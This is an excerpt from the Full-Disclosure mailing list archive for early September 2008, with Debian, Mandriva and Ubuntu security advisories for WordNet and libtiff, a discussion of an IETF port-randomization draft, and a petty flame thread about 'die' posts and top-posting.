From thijs at debian.org Mon Sep 1 20:17:47 2008 From: thijs at debian.org (Thijs Kinkhorst) Date: Mon, 1 Sep 2008 21:17:47 +0200 (CEST) Subject: [Full-disclosure] [SECURITY] [DSA 1634-1] New wordnet packages fix arbitrary code execution Message-ID: <20080901191747.6F115326F0B@morgana.loeki.tv> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1634-1 security at debian.org http://www.debian.org/security/ Thijs Kinkhorst September 01, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : wordnet Vulnerability : stack and heap overflows Problem type : local (remote) Debian-specific: no CVE id(s) : CVE-2008-2149 Debian Bug : 481186 Rob Holland discovered several programming errors in WordNet, an electronic lexical database of the English language. These flaws could allow arbitrary code execution when used with untrusted input, for example when WordNet is in use as a back end for a web application. For the stable distribution (etch), these problems have been fixed in version 1:2.1-4+etch1. For the testing distribution (lenny), these problems have been fixed in version 1:3.0-11+lenny1. For the unstable distribution (sid), these problems will be fixed soon. We recommend that you upgrade your wordnet package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. 
Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1.dsc Size/MD5 checksum: 772 24980d288101a1c11e60e38fe5ea945a http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1.diff.gz Size/MD5 checksum: 22912 bb970bd2ccd457c6310ba0c75e5ed2be http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1.orig.tar.gz Size/MD5 checksum: 6379385 95a6e8144254a92a5ea0e97771ef9d07 Architecture independent packages: http://security.debian.org/pool/updates/main/w/wordnet/wordnet-sense-index_2.1-4+etch1_all.deb Size/MD5 checksum: 2242538 dc75e162b0013a5d7d0c0679115b134c http://security.debian.org/pool/updates/main/w/wordnet/wordnet-base_2.1-4+etch1_all.deb Size/MD5 checksum: 8701430 a680094a45ddf87dd0bcbb5fd63ceae2 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_alpha.deb Size/MD5 checksum: 80734 3186aeb6b9365a333fdd608d5fa62ffe http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_alpha.deb Size/MD5 checksum: 109466 cc441b73b2ded97fff9fc5c668f2fbb0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_amd64.deb Size/MD5 checksum: 104990 b7b3225b10df973e2d8a652f770a6e1b http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_amd64.deb Size/MD5 checksum: 65118 bc75f17d4f5b1375fc3862ba80335d2f arm architecture (ARM) http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_arm.deb Size/MD5 checksum: 61020 57e49d1f532015f07cbf3f71bba24237 http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_arm.deb Size/MD5 checksum: 100056 43a1c7d6c272412f4f1eff5ff284fd54 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_hppa.deb Size/MD5 checksum: 108312 f6ed8345d69a1e13e9cd87f7974566fd 
http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_hppa.deb Size/MD5 checksum: 69896 a1649115a5bba73602f4c6dba8a57964 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_i386.deb Size/MD5 checksum: 63096 ff93d37e8edeb63fd9268b19b052f3e2 http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_i386.deb Size/MD5 checksum: 101738 65a6a41a5bf4de85c6ce474de7155c73 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_ia64.deb Size/MD5 checksum: 83014 98d7592aac60e394cca7262dbae45dc5 http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_ia64.deb Size/MD5 checksum: 119716 a4a53c0fe7acf1828386d2e08e443b7a mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_mips.deb Size/MD5 checksum: 105498 f76685b8631f82c01b0fc604d22cb7b3 http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_mips.deb Size/MD5 checksum: 73082 73a315a1e3706cc313559c7f8532232f mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_mipsel.deb Size/MD5 checksum: 104700 22d5b12949930d49d4d49ac63f106747 http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_mipsel.deb Size/MD5 checksum: 71604 78f164f9758891934cb3854c8a10c6e7 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_powerpc.deb Size/MD5 checksum: 108852 0b0448af12ac1052b11833252a269765 http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_powerpc.deb Size/MD5 checksum: 69846 44d14734b11f31fb1f3522d68fae68ad s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_s390.deb Size/MD5 checksum: 107032 a83524f4bc09a6f78a53216356043175 
http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_s390.deb Size/MD5 checksum: 65640 241a7fa7673077cfc762492a44c7764d sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/w/wordnet/wordnet_2.1-4+etch1_sparc.deb Size/MD5 checksum: 102918 1f7f85106a3f41cfc2162db49ce0ac1f http://security.debian.org/pool/updates/main/w/wordnet/wordnet-dev_2.1-4+etch1_sparc.deb Size/MD5 checksum: 64812 89d27a34508044af76f2eeac4e1c696a These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSLw/n2z0hbPcukPfAQJtQwgAsW+ORtd4lhMAsOaZ6mFQrHj3EJ7AnXRH 0hMoBxUM/ViyWJ/iKFgGKzbmAndl/ylRH3dWKkd4j/E08yQocvM5Ym3kSlV9ni1X sF6zNdD8eY9FLT6Ja7yT5RrKn7rriNhAr9MaktMq276eCaCpSoB85KfhJ+UGapPJ cMXLPW59z5BqgFi708stButXe0PHUmMcp/Zd+pvSTvsH+fLaxKK3DBRp2pH4DNLM Dceugrdzt10uZfeZGRClcDAX4u9HUPwHs7gW7EuaQH5Ni7Y+aZhsigJOGTOl4DOF 4nEgh5eth1WJ0iK1I01KOunfhXVxXWAxh6b27sZbHhpAvYoYl3aKNg== =EsVl -----END PGP SIGNATURE----- From coderman at gmail.com Tue Sep 2 15:15:20 2008 From: coderman at gmail.com (coderman) Date: Tue, 2 Sep 2008 07:15:20 -0700 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: <48bd038b.1c1d640a.5688.3991@mx.google.com> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <48bd038b.1c1d640a.5688.3991@mx.google.com> Message-ID: <4ef5fec60809020715o5f952350l3f485237e209b8b1@mail.gmail.com> On Tue, Sep 2, 2008 at 2:06 AM, Fernando Gont wrote: > ... 
there's no description of what Windows does some things speak for themselves... :) > Also, the base Linux system already implements Algorithm #3... why > ... patch if you seed/key #3 poorly, as just one example. (which you reference via RFC4086, etc) > P.S.: The "survey" section must be about 1% of the document. I'd be glad to > hear comments on the rest of the document. sure... section #4 should be: s/should consider randomizing/must randomize/ From Valdis.Kletnieks at vt.edu Tue Sep 2 17:05:31 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 02 Sep 2008 12:05:31 -0400 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: Your message of "Tue, 02 Sep 2008 17:17:43 +0800." <48BD04B7.60702@gmail.com> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <38325.1220299998@turing-police.cc.vt.edu> <48BC55D7.3010109@gmail.com> <43513.1220307806@turing-police.cc.vt.edu> <48BD04B7.60702@gmail.com> Message-ID: <12267.1220371531@turing-police.cc.vt.edu> On Tue, 02 Sep 2008 17:17:43 +0800, Pavel Labushev said: > "SECURITY PATCH tag on a fix" helps me to know that there is the problem > and I must consider the patch, check its correctness and maybe > test/backport/apply it to my production systems ASAP. Just as another > tags helps me to know that there are realiability and other issues I > must care about. OK, now s/security patch/silent data corruption/ and tell me what's *actually* different. Wow, you still need to consider it, check it, test it, and deploy it. Unless of course you don't give a shit about your data. But in that case, the security patch can probably be overlooked too. That's Linus's point - if the patch is important enough to go into one of the -stable tree kernels, it's probably something you want to install, whether or not it's a security patch. 
From anonymouspimp at gmail.com Tue Sep 2 17:51:22 2008 From: anonymouspimp at gmail.com (anonymous pimp) Date: Tue, 2 Sep 2008 19:51:22 +0300 Subject: [Full-disclosure] die Message-ID: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> die On 9/2/08, victor.harutyunyan at arca.am wrote: > test > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From tdjacr.wiki at gmail.com Tue Sep 2 18:50:26 2008 From: tdjacr.wiki at gmail.com (Thedjatclubrock) Date: Tue, 02 Sep 2008 13:50:26 -0400 Subject: [Full-disclosure] die In-Reply-To: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> Message-ID: <48BD7CE2.9060003@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 anonymous pimp wrote: > die > > > On 9/2/08, victor.harutyunyan at arca.am wrote: >> test >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > Can we please avoid messages like this one in the future, thank you.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (Darwin) iEYEARECAAYFAki9fOIACgkQJoEx0rzyOBl5vACfWrtUOAOVlObh1BMx8C6GRNB8 r1wAoI6OYiwhaAWDgMKMjd36M5uyWVAd =smCy -----END PGP SIGNATURE----- From nytrokiss at gmail.com Tue Sep 2 18:50:58 2008 From: nytrokiss at gmail.com (James Matthews) Date: Tue, 2 Sep 2008 10:50:58 -0700 Subject: [Full-disclosure] die In-Reply-To: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> Message-ID: <8a6b8e350809021050x4b0c77ccq1b3db513f26477e@mail.gmail.com> Double Die On Tue, Sep 2, 2008 at 9:51 AM, anonymous pimp wrote: > die > > > On 9/2/08, victor.harutyunyan at arca.am wrote: > > test > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.goldwatches.com/ From jdemott at crucialsecurity.com Tue Sep 2 18:57:05 2008 From: jdemott at crucialsecurity.com (Jared DeMott) Date: Tue, 02 Sep 2008 13:57:05 -0400 Subject: [Full-disclosure] die In-Reply-To: <8a6b8e350809021050x4b0c77ccq1b3db513f26477e@mail.gmail.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <8a6b8e350809021050x4b0c77ccq1b3db513f26477e@mail.gmail.com> Message-ID: <48BD7E71.30306@crucialsecurity.com> James Matthews wrote: > Double Die Gang, telling people to die is not nice. Please refer to [1] or [2].
[1] http://www.elliottsamazing.com/kindergarden.html [2] http://en.wikipedia.org/wiki/Ethic_of_reciprocity From xploitable at gmail.com Tue Sep 2 19:07:35 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 2 Sep 2008 19:07:35 +0100 Subject: [Full-disclosure] security news on cnet??? Message-ID: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com> you've not posted any security news all week, what's going on cnet??? is the journalist that does the security news off ill??? :( yours, cnet fan -- https://groups.google.com/group/n3td3v From Valdis.Kletnieks at vt.edu Tue Sep 2 19:13:26 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 02 Sep 2008 14:13:26 -0400 Subject: [Full-disclosure] die In-Reply-To: Your message of "Tue, 02 Sep 2008 13:57:05 EDT." <48BD7E71.30306@crucialsecurity.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <8a6b8e350809021050x4b0c77ccq1b3db513f26477e@mail.gmail.com> <48BD7E71.30306@crucialsecurity.com> Message-ID: <21110.1220379206@turing-police.cc.vt.edu> On Tue, 02 Sep 2008 13:57:05 EDT, Jared DeMott said: > James Matthews wrote: > > Double Die > Gang, telling people to die is not nice. Please refer to [1] or [2]. Ever notice that most of the 'die in a fire' comments come from top-posters?
From p.labushev at gmail.com Tue Sep 2 19:18:13 2008
From: p.labushev at gmail.com (Pavel Labushev)
Date: Wed, 03 Sep 2008 02:18:13 +0800
Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft
In-Reply-To: <12267.1220371531@turing-police.cc.vt.edu>
References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <38325.1220299998@turing-police.cc.vt.edu> <48BC55D7.3010109@gmail.com> <43513.1220307806@turing-police.cc.vt.edu> <48BD04B7.60702@gmail.com> <12267.1220371531@turing-police.cc.vt.edu>
Message-ID: <48BD8365.2060308@gmail.com>

Valdis.Kletnieks at vt.edu wrote:
> On Tue, 02 Sep 2008 17:17:43 +0800, Pavel Labushev said:
>
>> "SECURITY PATCH tag on a fix" helps me to know that there is the problem
>> and I must consider the patch, check its correctness and maybe
>> test/backport/apply it to my production systems ASAP. Just as other
>> tags help me to know that there are reliability and other issues I
>> must care about.
>
> OK, now s/security patch/silent data corruption/ and tell me what's *actually*
> different.

The consequences are actually and obviously different. Now, please, try to figure that out by yourself. Forget about Linus' point. Pretend you're a system administrator and try to think like one.

> Wow, you still need to consider it, check it, test it, and deploy it.

Not exactly.

> Unless of course you don't give a shit about your data. But in that case,
> the security patch can probably be overlooked too.

Hint: the data can be backed up.

> That's Linus's point - if the patch is important enough to go into one of
> the -stable tree kernels, it's probably something you want to install, whether
> or not it's a security patch.
Whether or not so-called -stable kernels are always stable - is another question. And not the last one - there are more. From nytrokiss at gmail.com Tue Sep 2 19:17:12 2008 From: nytrokiss at gmail.com (James Matthews) Date: Tue, 2 Sep 2008 11:17:12 -0700 Subject: [Full-disclosure] security news on cnet??? In-Reply-To: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com> References: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com> Message-ID: <8a6b8e350809021117u7046d373uf711a04edd1d0d0f@mail.gmail.com> I also enjoy Cnet security news. On Tue, Sep 2, 2008 at 11:07 AM, n3td3v wrote: > > you've not posted any security news all week, what's going on cnet??? is > the journalist that does the security news off ill??? > > :( > > yours, > > cnet fan > > -- > https://groups.google.com/group/n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- http://search.goldwatches.com/search.aspx?Search=Movado+Watches From fernando.gont at gmail.com Tue Sep 2 19:30:48 2008 From: fernando.gont at gmail.com (Fernando Gont) Date: Tue, 02 Sep 2008 15:30:48 -0300 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: <4ef5fec60809020715o5f952350l3f485237e209b8b1@mail.gmail.com> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <48bd038b.1c1d640a.5688.3991@mx.google.com> <4ef5fec60809020715o5f952350l3f485237e209b8b1@mail.gmail.com> Message-ID: <48bd875d.02c3f10a.364a.7c3b@mx.google.com> At 11:15 a.m. 02/09/2008, coderman wrote: >On Tue, Sep 2, 2008 at 2:06 AM, Fernando Gont wrote: > > ...
there's no description of what Windows does > >some things speak for themselves... :) What speaks for itself? Our work is a proposal for a few alternatives for doing port randomization. Two of them are new, and are supposed to avoid some of the problems that are usually caused by a trivial port randomization algorithm (e.g., algorithm #1 and algorithm #2). Full stop. We simply provide a small survey in case you ask yourself "what is being done out there" by popular TCP implementations. The survey is simply an appendix, and was added as I was examining the Linux and *BSD code myself. > > Also, the base Linux system already implements Algorithm #3... why > > ... patch > >if you seed/key #3 poorly, as just one example. (which you reference >via RFC4086, etc) If algorithm #3 is seeded poorly, then I think you should document it, and send a patch so that that problem is fixed in the base system. > > P.S.: The "survey" section must be about 1% of the document. I'd be glad to > > hear comments on the rest of the document. > >sure... section #4 should be: >s/should consider randomizing/must randomize/ If anything, it should be "should randomize". "MUSTs" are meant to mandate specific behaviors/rules that, if not followed, would lead to interoperability problems. -- Fernando Gont e-mail: fernando at gont.com.ar || fgont at acm.org PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 From randy at procyonlabs.com Tue Sep 2 19:35:23 2008 From: randy at procyonlabs.com (Randal T. Rioux) Date: Tue, 2 Sep 2008 14:35:23 -0400 (EDT) Subject: [Full-disclosure] security news on cnet??? 
In-Reply-To: <8a6b8e350809021117u7046d373uf711a04edd1d0d0f@mail.gmail.com> References: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com> <8a6b8e350809021117u7046d373uf711a04edd1d0d0f@mail.gmail.com> Message-ID: <60c228f48c77372e2e505ab1b29d5fe1.squirrel@meteor.procyonlabs.com> On Tue, Sep 2, 2008 at 11:07 AM, n3td3v wrote: > > you've not posted any security news all week, what's going on cnet??? is > the journalist that does the security news off ill??? > > :( > > yours, > > cnet fan surely they will cave to pressure from the global powers of the netdev group. i bet there'll be a story up for comment pretty soon now. randy From security at mandriva.com Tue Sep 2 20:08:01 2008 From: security at mandriva.com (security at mandriva.com) Date: Tue, 02 Sep 2008 13:08:01 -0600 Subject: [Full-disclosure] [ MDVSA-2008:182 ] wordnet Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:182 http://www.mandriva.com/security/ _______________________________________________________________________ Package : wordnet Date : September 2, 2008 Affected: 2008.0, 2008.1 _______________________________________________________________________ Problem Description: Rob Holland found several programming errors in WordNet which could lead to the execution of arbitrary code when used with untrusted input (CVE-2008-2149). The updated packages have been patched to prevent these issues.
_______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2149 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 1c6a1df61fe91dda3ae4dac057401fbc 2008.0/i586/libwordnet3.0-3.0-6.1mdv2008.0.i586.rpm 1802486553d178a0802fd0ad89b6cef6 2008.0/i586/libwordnet3.0-devel-3.0-6.1mdv2008.0.i586.rpm 751310829f7f292fa358fe30111dff14 2008.0/i586/wordnet-3.0-6.1mdv2008.0.i586.rpm 719473d84e3be3fdf46333f6faa74a41 2008.0/SRPMS/wordnet-3.0-6.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 5ff81320990de26154b15e56b30b51e1 2008.0/x86_64/lib64wordnet3.0-3.0-6.1mdv2008.0.x86_64.rpm 99d9ad1f9abaefbf9f6acb8b31f52027 2008.0/x86_64/lib64wordnet3.0-devel-3.0-6.1mdv2008.0.x86_64.rpm b91a656c9dc2d6ec69d51ba335c78b3d 2008.0/x86_64/wordnet-3.0-6.1mdv2008.0.x86_64.rpm 719473d84e3be3fdf46333f6faa74a41 2008.0/SRPMS/wordnet-3.0-6.1mdv2008.0.src.rpm Mandriva Linux 2008.1: 70639dc3c0f6905ee668f17dc9e6d0fb 2008.1/i586/libwordnet3.0-3.0-6.1mdv2008.1.i586.rpm abb67cb73d41e34361933e1f684b7b31 2008.1/i586/libwordnet3.0-devel-3.0-6.1mdv2008.1.i586.rpm 365af128c071777483b61ed89b760802 2008.1/i586/wordnet-3.0-6.1mdv2008.1.i586.rpm d5371cdefa639f61fc303c3804218c95 2008.1/SRPMS/wordnet-3.0-6.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 14bbe9699fe4d0b6b6aa6660a22799a7 2008.1/x86_64/lib64wordnet3.0-3.0-6.1mdv2008.1.x86_64.rpm 45c1a11f43f3b53517b63f9a74e15a1b 2008.1/x86_64/lib64wordnet3.0-devel-3.0-6.1mdv2008.1.x86_64.rpm 615b4e49a4be1edac0fc5320a46f1e9d 2008.1/x86_64/wordnet-3.0-6.1mdv2008.1.x86_64.rpm d5371cdefa639f61fc303c3804218c95 2008.1/SRPMS/wordnet-3.0-6.1mdv2008.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. 
You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIvWLZmqjQ0CJFipgRAhdfAJ4/nXJx0C4bu8vaDBN/26S3fXdNngCeI7Gw 6d9rt5zYII6WCveNT/Sa2Y4= =pXug -----END PGP SIGNATURE----- From dr at kyx.net Tue Sep 2 20:10:36 2008 From: dr at kyx.net (Dragos Ruiu) Date: Tue, 2 Sep 2008 12:10:36 -0700 Subject: [Full-disclosure] die In-Reply-To: <21110.1220379206@turing-police.cc.vt.edu> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <8a6b8e350809021050x4b0c77ccq1b3db513f26477e@mail.gmail.com> <48BD7E71.30306@crucialsecurity.com> <21110.1220379206@turing-police.cc.vt.edu> Message-ID: <02FEEEFC-BA0D-4AD8-9C90-96F8A0FC875C@kyx.net> Please support the Internet campaign to de-vilify top posting. On 2-Sep-08, at 11:13 AM, Valdis.Kletnieks at vt.edu wrote: > On Tue, 02 Sep 2008 13:57:05 EDT, Jared DeMott said: >> James Matthews wrote: >>> Double Die >> Gang, telling people to die is not nice. Please refer to [1] or [2]. > > Ever notice that most of the 'die in a fire' comments come from top- > posters? > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Seriously... with modern multi-paned mail readers, top-posting is a better way to communicate. cheers, --dr -- World Security Pros. Cutting Edge Training, Tools, and Techniques Buenos Aires, Argentina Sept. 30 / Oct. 
1 - 2008 http://ba-con.com.ar Tokyo, Japan November 12/13 2008 http://pacsec.jp Vancouver, Canada March 16-20 2009 http://cansecwest.com pgpkey http://dragos.com/ kyxpgp From william at lefkovics.net Tue Sep 2 20:17:13 2008 From: william at lefkovics.net (william at lefkovics.net) Date: Tue, 2 Sep 2008 13:17:13 -0600 Subject: [Full-disclosure] die Message-ID: <2d89d200$514dffa$4edaddf0$@com> It's often way too time consuming to navigate to bottom-posted commentary to form a reasonable sample size for assessment, so I'll have to take your word for it. ---------------------------------------- From: Valdis.Kletnieks at vt.edu Sent: Tuesday, September 02, 2008 11:14 AM To: "Jared DeMott" Subject: Re: [Full-disclosure] die On Tue, 02 Sep 2008 13:57:05 EDT, Jared DeMott said: > James Matthews wrote: > > Double Die > Gang, telling people to die is not nice. Please refer to [1] or [2]. Ever notice that most of the 'die in a fire' comments come from top-posters? _______________________________________________ Full-Disclosure - We believe in it. From xploitable at gmail.com Tue Sep 2 21:41:05 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 2 Sep 2008 21:41:05 +0100 Subject: [Full-disclosure] die In-Reply-To: <48BD7CE2.9060003@gmail.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <48BD7CE2.9060003@gmail.com> Message-ID: <4b6ee9310809021341v25349c53t4f4603faea01fd5b@mail.gmail.com> On Tue, Sep 2, 2008 at 6:50 PM, Thedjatclubrock wrote: > Can we please avoid messages like this one in the future, thank you. Who do you think you are, Gadi Evron or something? Don't tell people what to do.
-- https://groups.google.com/group/n3td3v From razishaban at gmail.com Tue Sep 2 21:59:03 2008 From: razishaban at gmail.com (Razi Shaban) Date: Tue, 2 Sep 2008 23:59:03 +0300 Subject: [Full-disclosure] die In-Reply-To: <4b6ee9310809021341v25349c53t4f4603faea01fd5b@mail.gmail.com> References: <2d792fb20809020951s43391a96u1823aac520f4a6c7@mail.gmail.com> <48BD7CE2.9060003@gmail.com> <4b6ee9310809021341v25349c53t4f4603faea01fd5b@mail.gmail.com> Message-ID: <2d792fb20809021359u3f07b51cmc1d08cca144eb92f@mail.gmail.com> On 9/2/08, n3td3v wrote: > On Tue, Sep 2, 2008 at 6:50 PM, Thedjatclubrock wrote: > > Can we please avoid messages like this one in the future, thank you. > > > Who do you think you are, Gadi Evron or something? Don't tell people what to do. > Who do you think you are, Gadi Evron or something? Don't tell people what to do. From kees at ubuntu.com Tue Sep 2 21:25:06 2008 From: kees at ubuntu.com (Kees Cook) Date: Tue, 2 Sep 2008 13:25:06 -0700 Subject: [Full-disclosure] [USN-639-1] tiff vulnerability Message-ID: <20080902202506.GO12974@outflux.net> =========================================================== Ubuntu Security Notice USN-639-1 September 02, 2008 tiff vulnerability CVE-2008-2327 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.04 Ubuntu 7.10 Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libtiff4 3.7.4-1ubuntu3.3 Ubuntu 7.04: libtiff4 3.8.2-6ubuntu1 Ubuntu 7.10: libtiff4 3.8.2-7ubuntu2.1 Ubuntu 8.04 LTS: libtiff4 3.8.2-7ubuntu3.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Drew Yao discovered that the TIFF library did not correctly validate LZW compressed TIFF images. 
If a user or automated system were tricked into processing a malicious image, a remote attacker could execute arbitrary code or cause an application linked against libtiff to crash, leading to a denial of service. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.3.diff.gz Size/MD5: 19356 56610d9fbd62d610f7004b3d30099c8e http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4-1ubuntu3.3.dsc Size/MD5: 802 426326dc802835cf100d63d6842b9939 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.7.4.orig.tar.gz Size/MD5: 1280113 02cf5c3820bda83b35bb35b45ae27005 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.3_amd64.deb Size/MD5: 220614 ff6387e7888bdf3b1d3515d0eede40c1 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.3_amd64.deb Size/MD5: 282146 75b17acb52792737598afba03b1cb835 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.3_amd64.deb Size/MD5: 475444 624f548a9b16339c5214b87a8587e0af http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.7.4-1ubuntu3.3_amd64.deb Size/MD5: 44520 1522729abef4145d8ae4fb125892e03b http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.7.4-1ubuntu3.3_amd64.deb Size/MD5: 49702 32735e413d785c456f8e340dbb3e974f i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.7.4-1ubuntu3.3_i386.deb Size/MD5: 205772 330fd846b4c42cfea4a86db7cd578032 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.7.4-1ubuntu3.3_i386.deb Size/MD5: 258868 4248ca40bb9516d3f15af5ea0b7d82e3 http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.7.4-1ubuntu3.3_i386.deb Size/MD5: 461668 